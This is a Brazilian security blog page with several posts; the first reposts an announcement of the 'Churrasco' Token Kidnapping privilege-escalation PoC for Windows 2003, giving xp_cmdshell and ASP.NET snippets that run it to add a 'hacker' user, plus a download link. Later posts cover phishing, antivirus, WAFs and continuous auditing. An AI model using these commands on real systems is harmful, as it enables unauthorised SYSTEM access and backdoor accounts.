blog.dennyroger.com.br

Token Kidnapping Windows 2003 PoC exploit

Por Cesar Cerrudo

It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf) was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account.

Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows services accounts can impersonate.

Other process (not services) that can impersonate are IIS 6 worker processes so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide shared hosting services then I would recomend to not allow users to run this kind of code from ASP.

-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:

exec xp_cmdshell ‘churrasco “net user /add hacker”‘

-Exploiting IIS 6 with ASP .NET :
…
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath(”churrasco.exe”);
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= ” \”net user /add hacker\” “;
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
…

You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

Enjoy.

Cesar Cerrudo

Fonte: http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html

Exchange 2007 e palestras de segurança agitam a semana

Esta semana estou participando de dois cursos: Introduction to Installing and Managing Microsoft Exchange Server 2007 e Managing Messaging Security using Microsoft Exchange Server 2007. O meu objetivo é conhecer na teoria e na prática os recursos de segurança disponíveis neste tipo de tecnologia. O meu foco está na segurança porque não administro servidores de correio eletrônico, porém, realizo auditorias e defino regras de firewall para ajudar na proteção do serviço de e-mail.

Hoje encontrei com um colega da área de infra-estrutura de rede e que por acaso também é o instrutor dos cursos, o Rover Marinho. Na minha opinião, o Rover é um dos melhores instrutores de cursos oficiais da Microsoft no Brasil. Aproveitando o intervalo do curso, o Rover me mostrou algumas fotos do treinamento de ISA Server realizado em 2007. As fotos mostram o mascote da turma do Linux (pingüim) na mesa do instrutor e também alguns desenhos do mascote da turma do FreeBSD no quadro branco. Foi muito divertido “provocar” a turma da Microsoft durante o treinamento do ISA Server. Não posso esquecer de comentar que a minha formação técnica é toda Microsoft, porém, trabalho há alguns anos com tecnologias de segurança baseadas em FreeBSD e Linux. Não podia perder a oportunidade da brincadeira durante o treinamento da Microsoft em 2007.

Para não perder o ritmo, esta semana tenho 8 palestras sobre segurança da informação na minha agenda. Estarei apresentando casos reais de vingança pela internet, a ameaça dos novos e-mails falsos que não são detectados pelos sistemas de antispam, as técnicas utilizadas pelos crackers no desenvolvimento de programas espiões, técnicas de juntar dois arquivos em um, as novas páginas clonadas, as ações jurídicas em um caso real de fraude corporativa, etc. Estarão participando das palestras mais de 1.000 profissionais de diversas áreas (jurídico, segurança da informação, recursos humanos, administrativo, marketing, tecnologia da informação, comercial, etc). O objetivo das apresentações é transformar o intangível em algo tangível e conscientizar as pessoas sobre os riscos na internet.

Em breve estarei publicando alguns recursos de segurança para correio eletrônico. Aguardem!

Abraços,

Denny Roger
denny@epesec.com.br

Falhas de segurança na aplicação estão entre as principais vulnerabilidades

Por Denny Roger

Bom, em pleno sábado a noite estou lendo o boletim de vulnerabilidades da última semana. Inclusive, não recomendo isso pra ninguém. O melhor é aproveitar o final de semana para se divertir. . Mas continuando …

Um dos boletins que acompanho é o do SANS. Analisando os relatórios podemos observar o crescimento acelerado de vulnerabilidades localizadas na camada 7 do modelo OSI, ou mais conhecida como camada de aplicação. Os firewalls realizam seus filtros na camada 3 do modelo OSI, a camada de rede. Ou seja, todos os ataques na camada 7 estão passando por todo e qualquer tipo de firewall. Isso mesmo!!! Voce pode estar utilizando o firewall mais premiado do mundo e estão invadindo a sua rede pela própria porta 80 (http).

Os firewalls não oferecem proteção contra ataques de cross site scripting, sql injection, cross-site request forgery, etc. Para resolver o problema é necessário que as empresas adotem tecnologias conhecidas como WAF (Web Application Firewall).

Qual empresa conhece este tipo de tecnologia (WAF)? Poucas! Quais profissionais da área de segurança da informação participaram de treinamentos ou sabem gerenciar este tipo de tecnologia? Eu não conheço nenhum. Conheço pessoas que desenvolvem este tipo de solução de segurança, agora, o pessoal que atua como analista de segurança desconhece o gerenciamento deste tipo de solução. Olha ai uma boa oportunidade para um “upgrade” na carreira.

Para acompanhar o boletim do SANS, acesse http://www.sans.org/newsletters/risk/.

Para quem tem interesse em acompanhar a evolução dos ataques na internet, recomendo acessar http://www.webappsec.org/projects/wafec/. Voce pode econtrar uma das listas de discussão mais rica em informações sobre invasões na camada 7 (passando por qualquer firewall).

Abraços,

Denny Roger
denny@epsec.com.br

Dicas para o final de semana: Médicos hackers e o Futuro Digital

Por Denny Roger

Para quem gosta de assistir filmes ou um bom programa na televisão, seguem duas dicas interessantes.

A primeira dica é o filme Missão Babilônia. O filme conta a história de uma jovem que sofreu uma alteração genética, ou seja, um médico “hacker” inseriu informações na mente desta jovem enquanto ela ainda era um feto. Essa jovem é um Google ambulante. O filme é estrelado por Vin Diesel.

Aproveitando o gancho do filme, atualmente as crianças no Brasil começam a ter aulas de informática a partir dos 2 anos de idade. Estas crianças já nascem “dominando” a tecnologia. É assustador o que estamos presenciando. Agora, o que impede de um médico hacker começar a ensinar uma criança enquanto estiver na barriga da mãe? Pense nisso!

A segunda dica é o programa “A Internet: O Futuro Digital” que está sendo exibido no Discovery Channel.

Este documentário apresenta entrevistas com os criadores das principais tecnologias inovadoras da internet. É interessante a concorrência entre o Facebook e o Myspace. O Google é apresentado como uma empresa que quer organizar e tornar disponível qualquer informação. O documentário também apresenta o Youtube, Craiglist, Napster, a Web 2.0 e etc. Realmente vale a pena assistir a este documentário.

Bom final de semana!

Denny Roger
denny@dennyroger.com.br

Os Hackers e as Instituições Financeiras

Os computadores são ferramentas que podem ser utilizados para o bem ou para o mal. Por exemplo, uma faca pode ser utilizada para cortar alimentos, porém, a faca pode transformar-se em uma arma nas mãos de um criminoso. A mesma situação ocorre com os computadores. Algumas pessoas utilizam os computadores para ações positivas (trabalho, pesquisa, estudo e etc) e outras utilizam para a realização de crimes na internet (disseminação de vírus, SPAM, roubo de informações confidencias e etc).

As empresas e os clientes das instituições financeiras estão presenciando uma verdadeira guerra na internet.

Em uma guerra no mundo real, o inimigo é facilmente detectado. Isso ocorre porque o inimigo utiliza tanques de guerra, lançam bombas dos aviões, utilizam submarinos, disparam mísseis e etc. No mundo virtual, conhecido como internet, torna-se mais dificil localizar o inimigo. O atacante não é fisicamente visível e o rastreamento não é fácil.

Algumas questões surgiram com o avanço da guerra na internet.

Por que o ladrão rouba o banco? Porque é onde fica o dinheiro.

Por que o ladrão está atacando os computadores? Porque é a “ferramenta” utilizada para acessar o dinheiro. Este acesso é possível através das tecnologias de internet banking.

Entre abril e junho de 2008 foram reportados 44.461 ataques no Brasil. Mais da metade dos ataques (54%) estão relacionados a fraudes segundo o Cert.br.

Um dos fatores que favorece a ação dos hackers contra as instituições financeiras é a falta de uma lei específica para crimes na internet.

Os atacantes estão fisicamente em um país, porém, invadem computadores de outros países para dificultar a rastreabilidade e o julgamento em um tribunal. Por exemplo, um banco angolano tem a sua página de internet banking clonada por um hacker. Esta página falsa está hospedada em Portugal. O criminoso está fisicamente em Angola, porém, invadiu um computador em Portugal e hospedou a página clonada no computador comprometido. O crime foi cometido em Angola ou em Portugal?

O departamento jurídico da maioria das instituições financeiras em todo o mundo não está preparado para responder esta questão. Este tipo de situação não é ensinado nas universidades ou nos cursos de direito.

Quando o cliente do banco informa a instituição financeira que seu dinheiro “desapareceu” da sua conta corrente, o banco investiga o caso para identificar os computadores utilizados para acesso ao internet banking e caso seja comprovado o acesso indevido realizado pelo hacker, o banco devolve o dinheiro ao seu cliente usando como critério o bom senso. É importante observarmos que cada banco adota um procedimento para a investigação de uma possível fraude. Existem casos onde o banco não devolve o dinheiro alegando ser uma auto fraude.

As instituições financeiras estão investindo em campanhas de conscientização, buscando divulgar estratégias e boas práticas de segurança para uso do internet banking.

As empresas e os clientes dos bancos perceberam que não adianta apenas instalar um programa de antivírus, firewall e anti-spam. Estes programas passam uma falsa sensação de segurança porque não possuem os recursos necessários para impedir todos os tipos de ataques na internet. Nos dias atuais, é necessário saber como se defender dos ataques na internet e conscientizar as pessoas sobre as novas ameaças.

Algumas dicas de segurança podem ajudar a minimizar o risco das armadilhas na internet:

1) Utilize apenas os computadores que você julgue confiável.

2) Fique atento a abordagens através de e-mail ou sites solicitando informações pessoais.

3) Leia atentamente as recomendações de segurança disponíveis no site do seu banco.

4) Mantenha seu software de antivírus e o Windows atualizados.

5) Utilize sempre um firewall pessoal.

Por Denny Roger: Engenheiro de Redes Sênior em Segurança da Informação, membro do Comitê Brasileiro sobre as normas de gestão de segurança da informação (série ISO 27000), especialista em análise de risco, projetos de redes seguras e perícia forense. E-mail: denny@dennyroger.com.br

www.dennyroger.com.br denny@dennyroger.com.br

Fonte: Folhadeangola.com

Aker Security emite AFCP - Aker Firewall Certified Professional

Por Denny Roger

Aproveitando a oportunidade oferecida pela maior empresa brasileira especializada no desenvolvimento de Firewall e produtos de VPN, a Aker Security Solutions, recebi hoje (01/10) a certificação como instrutor do curso AFT – Aker Firewall Training (módulos básico e avançado).

O meu principal objetivo é aplicar todo o conhecimento adquirido nos últimos 6 anos utilizando a tecnologia da Aker, na capacitação dos profissionais nas soluções de segurança da informação da Aker.

Em um primeiro momento estarei ministrando os cursos no exterior. Isso ocorre porque a Aker exporta para outros países diversos produtos na área de Segurança da Informação, tais como Firewall, VPN, Filtro de Conteúdo e Anti-SPAM, disponíveis em software e em appliances.

Os profissionais que desejam participar dos treinamentos no Brasil, podem obter mais informações através do site Aker.

Abraços,

Denny Roger

www.epsec.com.br
denny@epsec.com.br

A EPSEC é uma empresa brasileira especializada em desenvolvimento de campanhas de conscientização em Segurança da Informação.

Fundada em 2008 por profissionais com vasta experiência em projetos de alta complexidade em Segurança da Informação, Auditoria e Controles Internos, a EPSEC é reconhecida pelo mercado através de suas palestras inovadoras e por sua capacidade em disseminar a cultura sobre Segurança da Informação com alto valor agregado ao negócio de seus clientes.

Gestão de Segurança da Informação contra o iPhone 3G

Por Denny Roger

O terror dos administradores/gestores de segurança da informação acaba de chegar a sua empresa. Trata-se do iPhone 3G. Esta inovação da Apple agora conecta com o Exchange, suporta VPN IPSec da CISCO e WPA2 com autenticação 802.1X. Segure-se quem puder, é a geração Y atropelando a segurança da informação.

Abraços,

Denny Roger

www.epsec.com.br
denny@epsec.com.br

A EPSEC é uma empresa brasileira especializada em desenvolvimento de campanhas de conscientização em Segurança da Informação.

Fundada em 2008 por profissionais com vasta experiência em projetos de alta complexidade em Segurança da Informação, Auditoria e Controles Internos, a EPSEC é reconhecida pelo mercado através de suas palestras inovadoras e por sua capacidade em disseminar a cultura sobre Segurança da Informação com alto valor agregado ao negócio de seus clientes.

Treinamento para executivos e propaganda reduzem fraudes

Shalini Kesar, um cientista da Universidade de Utah (Estados Unidos), estudou alguns casos famosos de fraude no sistema de informática, catalogou os erros mais comuns e elaborou um plano eficiente de segurança dos sistemas. Primeiro, treine todos os executivos a respeito de aspectos técnicos e sociais da segurança dos sistemas. Depois, de modo sutil, divulgue a novidade para todos os funcionários, principalmente os mais jovens. Funcionários representam uma ameaça maior aos sistemas que estranhos; funcionários jovens representam uma ameaça maior ainda, porque eles são ousados. Contudo, se um funcionário souber que todos os executivos passaram por treinamento, ele tende a pensar duas vezes antes de pôr um golpe em execução.

Fonte: Informática Hoje edição de 23 aniversário

Antivírus desconhecidos detectam novas pragas na Internet

Por Denny Roger

Esta semana circulou na Internet brasileira um e-mail falso envolvendo a Caixa Econômica Federal.

Antes de chegar ao Brasil a mensagem falsa passou pela Holanda, Inglaterra, Estados Unidos e Espanha.

A engenharia social solicitava o recadastramento no site do banco, conforme descrito abaixo.

“Veja como é simples efetuar o recadastramento no novo internet banking caixa em poucos minutos você estará por dentro de tudo que mudou: www.caixa.gov.br/atualizacao/recadastro.”

Você pode observar que o endereço na mensagem falsa não existe no site verdadeiro do banco. Porém, quando a vitima clica no link é automaticamente redirecionada a conexão para um servidor nos Estados Unidos. É realizado o download do arquivo “recadastro.exe”.

O arquivo foi submetido a testes através do site www.virustotal.com. Dos 36 programas de antivírus testados, apenas 6 detectaram o código malicioso, tais como: AntiVir, CAT-QuickHeal, Ikarus, Rising, VirusBuster e Webwasher-Gateway.

Vejam só que interessante! Todos os programas de antivírus que detectaram a praga são desconhecidos pelas empresas e usuários em geral. Por que estes programas desconhecidos detectaram a praga? Por que os antivírus mais tradicionais e utilizados do mercado (TrendMicro, McAfee, Kaspersky, F-Secure, AVG, Avast, Panda e Symantec) não detectaram o código malicioso? Esta é a pergunta que não quer calar.

Conversando com o meu colega e um dos principais especialistas em segurança da informação do Brasil, Andre Pitkowski, chegamos à conclusão que as empresas devem utilizar mais de uma solução de antivírus. Pitkowski comentou que o ideal é ter uma “marca” de antivírus no gateway da rede, outra marca no antispam, outra marca nas estações de trabalho, outra marca nos servidores, etc. Concordo 100% com a idéia do Pitkowski.

Os antivírus passam falsa sensação de segurança. Isso ocorre porque não existe “vacina” para novas pragas virtuais. Os fabricantes de antivírus precisam de uma amostra da praga para que possam desenvolver a vacina. Enquanto a vacina não fica pronta e o ambiente computacional não é atualizado, a praga consegue agir de forma rápida. Às vezes tão rápida que os administradores de rede e segurança não sabem que o ambiente computacional foi infectado.

Existe também o caso das empresas que utilizam Linux em seus servidores. Alguns administradores desses servidores acreditam que dificilmente um vírus irá atacar o sistema Linux e simplesmente não instalam o programa de antivírus. A maioria das empresas em que realizei uma auditoria, os servidores Linux estavam sem antivírus. Estou falando de servidores essenciais ao bom funcionamento da rede. Por exemplo, DNS, correio eletrônico, servidor web e servidor de arquivos.

Agora, voltando ao e-mail falso que circulou esta semana no Brasil, o interessante é que os Crackers estão cada vez mais utilizando redes distribuídas em outros países. Tudo isso para dificultar a preservação das provas “eletrônicas” e rastreabilidade. Isso acontece porque são necessárias ações judiciais nos países utilizados pelos Crackers para reunir todas as evidencias.

Com a chegada do final de semana a situação esquenta na Internet. São os dias preferidos dos Crackers.

Bom final de semana a todos!

Abraços,

Denny Roger

www.epsec.com.br
denny@epsec.com.br

A EPSEC é uma empresa brasileira especializada em desenvolvimento de campanhas de conscientização em Segurança da Informação.

Fundada em 2008 por profissionais com vasta experiência em projetos de alta complexidade em Segurança da Informação, Auditoria e Controles Internos, a EPSEC é reconhecida pelo mercado através de suas palestras inovadoras e por sua capacidade em disseminar a cultura sobre Segurança da Informação com alto valor agregado ao negócio de seus clientes.

Auditoria Continua: Oportunidade para Auditoria Interna

Este artigo é uma idéia fantástica, que tem o nome de Alberto Afonso, um dos primeiros profissionais no Brasil a apresentar publicamente a ação dos bancos contra os Crackers. Atuando há mais de 6 anos na área de auditoria de um grande Banco multinacional, Alberto Afonso respira e vive estratégias de segurança da informação e auditoria.

Saiba como uma poderosa ferramenta de baixo custo pode ajudar a auditoria interna da sua empresa.

Por Alberto Afonso

Introdução / Objetivo

A auditoria continua consiste em uma técnica moderna de auditoria através de testes utilizando bases de dados informatizadas, mediante ferramentas de extração, análise e mineração de dados, baseada na avaliação de riscos e controles internos.

Atualmente este tema desperta grande interesse entre os Auditores Internos, conforme resultados de diversas pesquisas realizadas por grandes firmas e órgãos de classe. Isso ocorre devido ao potencial de atender à demanda atual por maior eficiência e eficácia nas auditorias, ou seja, maior cobertura com menos recursos.

O conceito de auditoria convencional “uma vez ao ano”, isoladamente, já não atende as necessidades das empresas. A velocidade em que os negócios são realizados, milhões de transações criadas e constantes mudanças nos processos, exige das Auditorias a mesma velocidade para realizar sua função, de auxiliar a organização a alcançar seus objetivos executando trabalhos de avaliação baseadas na avaliação de risco e controles.

A Auditoria Continua não invalida ou substituí a auditoria convencional, porém complementa e auxilia na definição do plano de auditoria, aumenta a presença da Auditoria Interna junto aos auditados, melhorando o nível de controles.

Aspectos Gerais

O papel da auditoria continua é realizar uma avaliação mais freqüente e temporal da qualidade dos controles e de gerenciamento de riscos, resultando na identificação de tendências, oportunidades, deficiência de controles e pode ser utilizada como ferramenta de gestão.

Alguns dos maiores benefícios da Auditoria Contínua são:

- Aumento da eficiência da Auditoria (custos)
- Aumento do escopo e cobertura da auditoria
- Detecção e Reporte dos pontos com maior velocidade (pro atividade)
- Aumento das chance de mitigar riscos
- Aumento da assertividade das conclusões de Auditoria
- Aumento na detecção de erros, falhas e fraudes financeiras e operacionais
- Criação de testes de auditoria automáticos
- Suporte à áreas de controles, como Risco Operacional, Controles Internos e Compliance.

Auditoria continua é qualquer método utilizado para realizar auditoria em bases de dados contínuas para avaliações de risco e controle, sendo uma das melhores práticas de análise de dados (população, não apenas amostras) com foco preventivo e de detecção.

Para realização dos testes de Auditoria Continua é necessário obter acesso à ferramentas de tecnologia adequadas e às base de dados objetos da avaliação.

As duas formas de atuação (testes de auditoria) são:

- baseada em controle - Consiste em avaliar se os controles estão funcionando adequadamente.
- baseada em risco - Identifica e avalia os riscos através de Indicadores de Riscos (KRI´s).

O reporte dos pontos de auditoria (“findings”), a partir dos testes de Auditoria Continua, são similares a uma monitoração através de alertas e notificações com os desvios identificados, e devem ser realizados de forma tempestiva. Estes relatórios são direcionados sempre para a gerência responsável pelo processo, ou um nível acima, que pode adotar planos de ação imediatos e evitar perdas financeiras e mitigar outros riscos, sejam eles de fraudes, abusos ou de imagem.

As tendências, riscos e deficiências de controles podem ser notadas a partir da consolidação periódica dos desvios em relação ao universo testado (os resultados dos testes podem ser mantidos em papéis de trabalho eletrônicos), sendo também reportado de forma consolidada através de relatórios de posicionamento.

Premissas

Para utilização desta metodologia algumas premissa devem ser observadas e respeitadas a fim de que que seja tomada a decisão de implementar ou não Auditoria Continua.

- A empresa deve ter seus processos e transações (ou pelo menos àqueles mais críticos ao negócio) suportados por sistemas de tecnologia da informação.

- Deve haver envolvimento direto do CAE (Chief Audit Executive) que será o motivador da implementação e deve buscar o apoio do corpo gerencial / executivo, divulgando os benefícios e importância da Auditoria Continua.

- Ter independência para o acesso às informações do negócio.

- Tecnologia para acesso (leitura), tratamento e análise das informações (bases de dados).

Desenvolvimento

Ao contrário do que possa parecer, a implementação desta metodologia de trabalho de auditoria não pode, nem deve, ser dispendiosa como, por exemplo, o desenvolvimento de um sistema de monitoração ou criação de sistemas de auditoria continua.

Atualmente as Auditorias Internas já mantém prática de acessos à base de dados através de CAATS (Computer Assisted Audit Techniques), sendo possível associar as mesmas práticas para a implementação de Auditoria Contínua.

O fluxograma e os dez passos a seguir resumem os pontos principais da implementação da Auditoria Continua.

Fluxograma da Auditoria Continua

1 – Estabelecer um programa de auditoria, objetivos e prioridades de testes

A Auditoria deve concentrar os esforços nos riscos de maior relevância e nos controles mais sensíveis, principalmente aqueles cujo nível de monitoração pela gerência seja inexistente, fraco ou ineficiente.

Uma matriz de risco deve ser preparada, onde todos os riscos inerentes aos processos / transações que serão testados devem ser mapeados, classificados e documentados no programa de auditoria. Os Controles mitigantes, como por exemplo, controles SOXA, segregação de função, alçadas, monitorações e etc, também devem ser mapeados e documentados em um programa de auditoria continua.

Os testes de auditoria devem ser documentados nos papéis de trabalho do programa da Auditoria Continua e devem conter o escopo e o critério de cada teste. As conclusões dos testes e desvios encontrados devem ser documentados nestes papeis.

O conceito de “Low Hanging Fruit” deve ser aplicado, ou seja, os testes mais fáceis devem ser implementados mais rápido.

2 – Apoio e suporte do nível executivo

A implementação da Auditoria Continua deve ser realizada com o apoio das áreas de negócios que tenham interesse nestes resultados. A metodologia deve ser apresentada para a gerência e parcerias devem ser feitas.

Reuniões com os gerentes de produtos, processos e operações.

3 – Averiguar o grau em que cada área gerencial está exercendo seu papel na monitoração dos controles

Quando há processos de monitoração, estes devem ser considerados na realização dos testes, pois quanto maior a cobertura do processo de monitoração, menor será o esforço despendido da Auditoria Continua, que poderá efetuar testes sobre o processo de monitoração, se necessário.

4 – Selecionar as soluções tecnológicas apropriadas e treinar a equipe

As ferramentas utilizadas na Auditoria Continua devem ser selecionadas de acordo com as tecnologias utilizadas na empresa.

Partindo da premissa que a Auditoria tem acesso às bases de dados, seria necessário obter ferramentas de análise de dados, estatística, “queries”, “miner”, como pro exemplo ACL, SAS, BO, Access, ou similares.

Devem ser identificados os profissionais adequados e estes devem receber o treinamento necessário para operar as ferramentas selecionadas.

5 – Construir Audit Data warehouse (identificação, fonte, aprendizado, acesso e coleta)

As bases de dados que serão testadas devem ser identificadas em conjunto com as áreas de negócio envolvidas, estas bases devem ser compreendidas. Antes de obter a liberação de acesso deve ser garantida a integridade das informações disponibilizadas à Auditoria.

O acesso às bases deve ser restrito somente às pessoas que farão a manipulação dos dados e construção do Data Warehouse.

O Data Warehouse para a AC (AUDITORIA CONTINUA) pode ser um espaço em disco de um servidor, um servidor dedicado ou até um Desktop, desde que tenha capacidade e segurança necessária para a realização do trabalho.

Há casos de bases que podem ser mapeadas a partir do local de origem pelas ferramentas de extração de dados. Nestes casos somente os resultados, logs, leiautes e scripts devem ser armazenados no Data Warehouse.

6 – Testes de auditoria freqüentes

Os testes da AC (AUDITORIA CONTINUA) devem ser realizados com a freqüência adequada à necessidade de cada controle objeto destes testes. Estas freqüências podem ser de diárias a anuais ou pontuais.

Os testes podem ser baseados em controles ou em riscos. Os testes de controle geralmente demonstram se o controle funciona adequadamente ou em conformidade. Para testes baseados em risco, os resultados demonstram a exposição e o apetite de risco do negócio, como por exemplo, despesas ou gastos acima do aceitável, abusos e etc.

É importante o alinhamento junto às áreas de negócio quanto ao “apetite de risco”, pois os critérios dos testes podem ser baseados nesta informação.

Os testes de AC (AUDITORIA CONTINUA) são na maioria dinâmicos e podem ser modificadas de acordo com a evolução do trabalho, alterações nos processos e controles. Uma análise continua sobre a efetividade e resultados dos testes deve ser realizada para adaptação, continuidade ou maior abrangência dos testes.

7 – Relatórios oportunos e temporais

Os relatórios com os desvios devem ser enviados aos responsáveis de acordo com a freqüência dos testes com o objetivo de mitigar perdas, fraudes e outros riscos.

As pessoas chaves, responsáveis em mitigar estes riscos, devem ser identificadas e estas estar informadas sobre os procedimentos e funcionamento da Auditoria Continua. Casos mais relevantes ou que necessitam ações imediatas devem ser formalmente reportados a níveis superiores (ex: Diretoria) identificados e informados. O reporte pode ser feito via correio eletrônico, no momento da identificação do problema.

8 – Consolidações dos resultados e identificação das deficiências de controle

Os desvios, conclusões e resultados devem ser armazenados e, periodicamente, consolidados e analisados.

A partir desta consolidação podem ser identificadas tendências, deficiências de controles, riscos e etc, que devem ser reportados à alta gerência, através de um relatório de posicionamento da AC.

9 – Recomendações de melhorias nos controles

Recomendações sobre melhorias operacionais, deficiências de controles e riscos podem ser direcionadas nestes relatórios e ações da gerência propostas e discutidas.

10 – Acompanhar as ações da gerência

As ações das gerências, para os casos em que os planos de ação não forem executados, devem ser monitoradas pela auditoria até a conclusão.

Conclusão

A Auditoria Continua é uma ferramenta bastante poderosa e de fácil implantação, quando existe o apoio do CAE (Chief Audit Executive) e da alta administração e com resultados imediatos.

Os problemas podem ser rapidamente identificados e as soluções propostas tomadas a seguir.

O fator psicológico sobre os envolvidos no processo também é um componente de controle bastante eficiente e que se destaca rapidamente após o surgimento da Auditoria Continua.

É possível que seja implementado com um custo razoavelmente baixo, aproveitando-se em alguns casos os recursos já disponíveis na empresa e na própria Auditoria Interna.

Alberto Afonso, CIA, CCSA, QA, CPA-20, SAP
Responsável pela implantação de Auditoria Continua em um Grande Banco multinacional, utilizando a metodologia descrita acima e com baixo investimento.

Contato: auditoria_continua@yahoogrupos.com.br
Grupo de discussão: http://br.groups.yahoo.com/group/auditoria_continua